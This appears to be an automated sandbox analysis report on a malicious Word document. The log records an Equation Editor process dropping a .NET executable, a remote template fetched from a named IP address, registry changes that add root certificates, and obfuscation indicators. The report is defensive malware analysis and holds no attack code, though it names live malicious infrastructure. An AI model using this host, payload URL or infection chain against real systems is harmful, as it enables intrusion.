Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: credssp.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: rpcrtremote.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
Source: 0225139776.docx.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\0225139776.docx.doc
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: 0225139776.docx.doc Initial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: 0225139776.docx.doc Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, JMsQw4TYy6wBk4vgS3.cs .Net Code: gdlTCXgjlF System.Reflection.Assembly.Load(byte[])
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, JMsQw4TYy6wBk4vgS3.cs .Net Code: gdlTCXgjlF System.Reflection.Assembly.Load(byte[])
Source: 10.2.millitingacy20306.exe.990000.0.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0067884F push ebx; ret 9_2_00678853
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00678808 push ebx; ret 9_2_0067884B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00665EDF push cs; retf 9_2_00665EE0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00678282 push ecx; ret 9_2_0067828B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0066C28C pushad ; retn 0066h 9_2_0066C28D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0067448A push ecx; ret 9_2_0067448B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00674492 push ecx; ret 9_2_00674493
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00678292 push ecx; ret 9_2_00678293
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00668F60 push eax; retf 9_2_00668F61
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0067577E push ecx; ret 9_2_0067577F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00663B32 push FF0067D0h; retf 9_2_00663B89
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00675F0E push edx; ret 9_2_00675F0F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00675F16 push edx; ret 9_2_00675F17
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_006787EA push eax; ret 9_2_006787EB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_006601F4 push eax; retf 9_2_006601F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00675786 push ecx; ret 9_2_00675787
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 10_2_002192A9 push esp; retf 10_2_002192AB
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 10_2_00219295 push esp; retf 10_2_00219297
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 10_2_002192EA push esp; retf 10_2_002192EB
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 10_2_002192FD push ebx; retf 10_2_002192FF
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 10_2_002192C4 push esp; retf 10_2_002192C5
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 10_2_00219332 push ebx; retf 10_2_00219333
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 10_2_00219315 push ebx; retf 10_2_00219316
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 10_2_00219346 push ebx; retf 10_2_00219347
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 10_2_0021935D push ebx; retf 10_2_0021935E
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_003D214D push ebx; iretd 13_2_003D21EA
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_006190F8 pushfd ; retn 0056h 13_2_006190F9
Source: H363BpKqz0MdVd7[1].exe.9.dr Static PE information: section name: .text entropy: 7.956942148046824
Source: millitingacy20306.exe.9.dr Static PE information: section name: .text entropy: 7.956942148046824
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, nMkqWItOThCtKV1dNC.cs High entropy of concatenated method names: 'Kheuo1D6E8', 'BxguV3Qqhi', 'Ekhu3erEFX', 'K1BuSMEhnG', 'hCgutOcQoy', 'm0qudKv1sg', 'tWCuZwcH7H', 'OpgubjMPV0', 'V4xukjf6qI', 'j7yu1Wl7Ct'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, R1ccbUdiuKavfKwOiv.cs High entropy of concatenated method names: 'Inr4XVd4yh', 'oMf4Mcjjy9', 'aPj4F5XVJp', 'jet4fyqoyM', 'Wxp4tWvH2P', 'Cm34dp637R', 'mkih4jFitxVROj2J50', 'ubh3YeQ2JsSmMplcdk', 'wVb44itlFy', 'Q3e4UNg7dV'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, piA8kBwf8uSnQBkXIf.cs High entropy of concatenated method names: 'HumZFQTxsI', 'r1rZfAG9Ao', 'ToString', 'jcFZqeXIrG', 'z9BZcGHuTQ', 'w3tZugig2D', 'm4CZRKV25X', 'DwJZl5IMdc', 'cJ2ZXWahIl', 'xdYZMg5m3v'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, iCoOLXYlNl0mxrb2OV.cs High entropy of concatenated method names: 'aFdZjcjVBI', 'hSpZ6bVtiH', 'PFHbarDev3', 'nHnb4IPVbV', 'c9tZYJ4ZZQ', 'WYAZhUrd6n', 'kAIZ2JHbA8', 'uK4Zijl1nD', 'giVZE8LiSg', 'cxXZJLtQAH'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, A2Kwk8N6ZXA7TrM6cD.cs High entropy of concatenated method names: 'WMwA3I3W0H', 'SGoASpgd1q', 'mhPABfI8ap', 'zcOA84oPtM', 'bbiAOG9trp', 'Al5ALapfuN', 'BYNAWRqKwP', 'SOcA0nRgsQ', 'gMHAQaBTOo', 'hdWAYDQkWj'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, gp45D2kqZ1t0SupgjDp.cs High entropy of concatenated method names: 'yiAk5HBROL', 'hL3kDKyNLa', 'enDkC153Y4', 'TJfkoWKXLH', 'Pcjk9QDtwV', 'bIhkVmJni8', 'JNtkgqnrch', 'HBYk3aYnav', 'qsqkSIUtJP', 's6bkrDDVQ5'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, A2AAfCzfetqLVaEsaJ.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xkVkAo9w72', 'lomktDYGPc', 'LVgkduTyVM', 'R4EkZJc31p', 'V58kbTu9IL', 's6LkkHhHI4', 'FLak1bNu6l'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, iMjZsLFxfxH3l8nvPC.cs High entropy of concatenated method names: 'rSIciM7NjJ', 'WWkcEjQPmS', 'OJkcJ5l9At', 'jX7ceZdBe8', 'lmvcmEXkS9', 'Ay1cH2iADI', 'g2Vc7fRXBs', 'qOWcjN0R0J', 'HxWcGkEpS0', 'NX9c6qusdv'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, LB9OfaymN1hyy4IOhE.cs High entropy of concatenated method names: 'Q0IR986xkP', 'c42RgxwxRm', 'sKluIVdjae', 'f2VuOADq56', 'Mc9uLB55Sv', 'XaeuPjYNdQ', 'tjAuWu4F1P', 'dsEu0Yuitq', 'AnGuvCINkQ', 'C0YuQFko7d'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, W2ykdW3Am2b4r0yX4J.cs High entropy of concatenated method names: 'pXqX5qU8lk', 'TBKXDIO1Qd', 'Ux2XCVjY5X', 'yruXo1oBOj', 'IMGX9KgSTq', 'NBdXVKQGP9', 'zG3XgcK9jI', 'FXAX34LLae', 'GxoXSWCPVJ', 'gDcXr5S8IE'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, VIYLCOLmp9IJAk2PZn.cs High entropy of concatenated method names: 'rtik4v0KeY', 'QFjkUuqm3R', 'rlqkTekE4n', 'EwDkqx57ta', 'GWikcnZHJA', 'CCBkR2NFeV', 'vcXkl9Qmdx', 'jDcb7eKMQ7', 'WbrbjHhoH1', 'PaMbGTnyZu'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, HOywRAxWLhf94FxxiR.cs High entropy of concatenated method names: 'G5dbBJQqbo', 'Oeob8MA3Ga', 'bi2bIEwmFj', 'zM3bOXFKyS', 'OPIbinHY0a', 'sYObLugFyu', 'Next', 'Next', 'Next', 'NextBytes'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, lr6D7krRwJpAs5DJI9.cs High entropy of concatenated method names: 'Dispose', 'x754GTAp2J', 'BLcp8labQo', 'gXDssev9mP', 'y6446XUknW', 'd1l4zfevfT', 'ProcessDialogKey', 'BZSpaGEn6c', 'BBGp46UjQU', 'TLbppXEuaP'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, kdgnP2lRDcDXOsF1YV.cs High entropy of concatenated method names: 'th6lNfRi6q', 'noFlcTrRu4', 'zTPlR5HLkM', 'JG3lXfalYL', 'eoPlMLj5nm', 'sJZRmGmGkd', 'i7wRHS6OHB', 'u3YR73qrIn', 'tStRju5BtW', 't1kRGOLlZ0'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, w1hPeBSJBRtHWHPfGs.cs High entropy of concatenated method names: 'zEsXq74pXx', 'JbfXu6BIDA', 'x6TXlpE6NJ', 'eGBl6JIqug', 'Cijlzmr7ff', 'fRWXaCpl1L', 'wfaX4bu5Ik', 'v2kXpkmUXY', 'DPmXU4FONk', 'DMmXTmmagd'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, WxtM0d8xtsSb4gH5rt.cs High entropy of concatenated method names: 'PDRCSE6g3', 'KQ7oSs8Ts', 'ovMVGW9Fh', 'F9sgrK1gC', 'utKSooaNq', 'bV0rWZbG3', 'bdNGekN5d3K4VUNith', 'DKYscp0mbxHK2Jb0yG', 'R9DbHeusW', 'Jcg10ByYf'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, UxbJeVopTxfRmWCZ5e.cs High entropy of concatenated method names: 'ToString', 'iBkdYWrWkG', 'Ot8d8uuUK2', 'DnjdIOoN9V', 'MVKdOphAMO', 'mhmdLgVGr7', 'OlSdPVaK3M', 'IAOdW1X7PW', 'jLsd0Giw4h', 'u9bdvSrutG'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, JMsQw4TYy6wBk4vgS3.cs High entropy of concatenated method names: 'mBgUN13te4', 'R57Uqtu6qQ', 'MnqUcANdqH', 'qZNUuUpaRy', 'jf5URlj3ly', 'FSfUlymF7c', 'EkfUXGByaU', 'bEuUMSC826', 'CITUKvsdI5', 'AlKUFJk1sI'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, Fj4y7cbUAU8ypRwety.cs High entropy of concatenated method names: 'Kgcbq0OGyw', 'IPtbccWnBi', 'gwqbu1SM4h', 'YRMbRi0xTL', 'EIMblIj29V', 'j9HbXEhjrq', 'UL9bMLoC35', 'xrLbKyLKGH', 'QQSbFmDS9r', 'RvnbfCTonl'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, TnNsaokGxfgWcajJlHc.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WkX1iPyZcr', 'Awu1Eq6Vhm', 'uTQ1JmViwV', 'En11eYNIFk', 'yyl1mKXgd5', 'btQ1HUcExl', 'ymR17g9Gwx'
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, UtxCOWKt6ay2Ld6OyO.cs High entropy of concatenated method names: 'IOEtQ0B1VS', 'heTthRWboI', 'NWvtihJFVv', 'K1itES4Ifn', 'WiCt8fJ2G0', 'DdGtIr6f7Y', 'StgtOoIYmv', 'WxQtLhjWct', 'b3utPNOGP1', 'nM0tW9cKFL'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, nMkqWItOThCtKV1dNC.cs High entropy of concatenated method names: 'Kheuo1D6E8', 'BxguV3Qqhi', 'Ekhu3erEFX', 'K1BuSMEhnG', 'hCgutOcQoy', 'm0qudKv1sg', 'tWCuZwcH7H', 'OpgubjMPV0', 'V4xukjf6qI', 'j7yu1Wl7Ct'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, R1ccbUdiuKavfKwOiv.cs High entropy of concatenated method names: 'Inr4XVd4yh', 'oMf4Mcjjy9', 'aPj4F5XVJp', 'jet4fyqoyM', 'Wxp4tWvH2P', 'Cm34dp637R', 'mkih4jFitxVROj2J50', 'ubh3YeQ2JsSmMplcdk', 'wVb44itlFy', 'Q3e4UNg7dV'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, piA8kBwf8uSnQBkXIf.cs High entropy of concatenated method names: 'HumZFQTxsI', 'r1rZfAG9Ao', 'ToString', 'jcFZqeXIrG', 'z9BZcGHuTQ', 'w3tZugig2D', 'm4CZRKV25X', 'DwJZl5IMdc', 'cJ2ZXWahIl', 'xdYZMg5m3v'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, iCoOLXYlNl0mxrb2OV.cs High entropy of concatenated method names: 'aFdZjcjVBI', 'hSpZ6bVtiH', 'PFHbarDev3', 'nHnb4IPVbV', 'c9tZYJ4ZZQ', 'WYAZhUrd6n', 'kAIZ2JHbA8', 'uK4Zijl1nD', 'giVZE8LiSg', 'cxXZJLtQAH'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, A2Kwk8N6ZXA7TrM6cD.cs High entropy of concatenated method names: 'WMwA3I3W0H', 'SGoASpgd1q', 'mhPABfI8ap', 'zcOA84oPtM', 'bbiAOG9trp', 'Al5ALapfuN', 'BYNAWRqKwP', 'SOcA0nRgsQ', 'gMHAQaBTOo', 'hdWAYDQkWj'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, gp45D2kqZ1t0SupgjDp.cs High entropy of concatenated method names: 'yiAk5HBROL', 'hL3kDKyNLa', 'enDkC153Y4', 'TJfkoWKXLH', 'Pcjk9QDtwV', 'bIhkVmJni8', 'JNtkgqnrch', 'HBYk3aYnav', 'qsqkSIUtJP', 's6bkrDDVQ5'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, A2AAfCzfetqLVaEsaJ.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xkVkAo9w72', 'lomktDYGPc', 'LVgkduTyVM', 'R4EkZJc31p', 'V58kbTu9IL', 's6LkkHhHI4', 'FLak1bNu6l'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, iMjZsLFxfxH3l8nvPC.cs High entropy of concatenated method names: 'rSIciM7NjJ', 'WWkcEjQPmS', 'OJkcJ5l9At', 'jX7ceZdBe8', 'lmvcmEXkS9', 'Ay1cH2iADI', 'g2Vc7fRXBs', 'qOWcjN0R0J', 'HxWcGkEpS0', 'NX9c6qusdv'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, LB9OfaymN1hyy4IOhE.cs High entropy of concatenated method names: 'Q0IR986xkP', 'c42RgxwxRm', 'sKluIVdjae', 'f2VuOADq56', 'Mc9uLB55Sv', 'XaeuPjYNdQ', 'tjAuWu4F1P', 'dsEu0Yuitq', 'AnGuvCINkQ', 'C0YuQFko7d'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, W2ykdW3Am2b4r0yX4J.cs High entropy of concatenated method names: 'pXqX5qU8lk', 'TBKXDIO1Qd', 'Ux2XCVjY5X', 'yruXo1oBOj', 'IMGX9KgSTq', 'NBdXVKQGP9', 'zG3XgcK9jI', 'FXAX34LLae', 'GxoXSWCPVJ', 'gDcXr5S8IE'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, VIYLCOLmp9IJAk2PZn.cs High entropy of concatenated method names: 'rtik4v0KeY', 'QFjkUuqm3R', 'rlqkTekE4n', 'EwDkqx57ta', 'GWikcnZHJA', 'CCBkR2NFeV', 'vcXkl9Qmdx', 'jDcb7eKMQ7', 'WbrbjHhoH1', 'PaMbGTnyZu'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, HOywRAxWLhf94FxxiR.cs High entropy of concatenated method names: 'G5dbBJQqbo', 'Oeob8MA3Ga', 'bi2bIEwmFj', 'zM3bOXFKyS', 'OPIbinHY0a', 'sYObLugFyu', 'Next', 'Next', 'Next', 'NextBytes'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, lr6D7krRwJpAs5DJI9.cs High entropy of concatenated method names: 'Dispose', 'x754GTAp2J', 'BLcp8labQo', 'gXDssev9mP', 'y6446XUknW', 'd1l4zfevfT', 'ProcessDialogKey', 'BZSpaGEn6c', 'BBGp46UjQU', 'TLbppXEuaP'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, kdgnP2lRDcDXOsF1YV.cs High entropy of concatenated method names: 'th6lNfRi6q', 'noFlcTrRu4', 'zTPlR5HLkM', 'JG3lXfalYL', 'eoPlMLj5nm', 'sJZRmGmGkd', 'i7wRHS6OHB', 'u3YR73qrIn', 'tStRju5BtW', 't1kRGOLlZ0'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, w1hPeBSJBRtHWHPfGs.cs High entropy of concatenated method names: 'zEsXq74pXx', 'JbfXu6BIDA', 'x6TXlpE6NJ', 'eGBl6JIqug', 'Cijlzmr7ff', 'fRWXaCpl1L', 'wfaX4bu5Ik', 'v2kXpkmUXY', 'DPmXU4FONk', 'DMmXTmmagd'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, WxtM0d8xtsSb4gH5rt.cs High entropy of concatenated method names: 'PDRCSE6g3', 'KQ7oSs8Ts', 'ovMVGW9Fh', 'F9sgrK1gC', 'utKSooaNq', 'bV0rWZbG3', 'bdNGekN5d3K4VUNith', 'DKYscp0mbxHK2Jb0yG', 'R9DbHeusW', 'Jcg10ByYf'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, UxbJeVopTxfRmWCZ5e.cs High entropy of concatenated method names: 'ToString', 'iBkdYWrWkG', 'Ot8d8uuUK2', 'DnjdIOoN9V', 'MVKdOphAMO', 'mhmdLgVGr7', 'OlSdPVaK3M', 'IAOdW1X7PW', 'jLsd0Giw4h', 'u9bdvSrutG'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, JMsQw4TYy6wBk4vgS3.cs High entropy of concatenated method names: 'mBgUN13te4', 'R57Uqtu6qQ', 'MnqUcANdqH', 'qZNUuUpaRy', 'jf5URlj3ly', 'FSfUlymF7c', 'EkfUXGByaU', 'bEuUMSC826', 'CITUKvsdI5', 'AlKUFJk1sI'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, Fj4y7cbUAU8ypRwety.cs High entropy of concatenated method names: 'Kgcbq0OGyw', 'IPtbccWnBi', 'gwqbu1SM4h', 'YRMbRi0xTL', 'EIMblIj29V', 'j9HbXEhjrq', 'UL9bMLoC35', 'xrLbKyLKGH', 'QQSbFmDS9r', 'RvnbfCTonl'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, TnNsaokGxfgWcajJlHc.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WkX1iPyZcr', 'Awu1Eq6Vhm', 'uTQ1JmViwV', 'En11eYNIFk', 'yyl1mKXgd5', 'btQ1HUcExl', 'ymR17g9Gwx'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, UtxCOWKt6ay2Ld6OyO.cs High entropy of concatenated method names: 'IOEtQ0B1VS', 'heTthRWboI', 'NWvtihJFVv', 'K1itES4Ifn', 'WiCt8fJ2G0', 'DdGtIr6f7Y', 'StgtOoIYmv', 'WxQtLhjWct', 'b3utPNOGP1', 'nM0tW9cKFL'
Source: 10.2.millitingacy20306.exe.990000.0.raw.unpack, JK.cs High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'

Persistence and Installation Behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: \Device\RdpDr\;:1\66.63.187.123\DavWWWRoot
Source: settings.xml.rels Extracted files from sample: http://66.63.187.123/txt/millizxc.doc
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Section loaded: netapi32.dll and davhlpr.dll loaded
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\millitingacy20306.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\H363BpKqz0MdVd7[1].exe
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
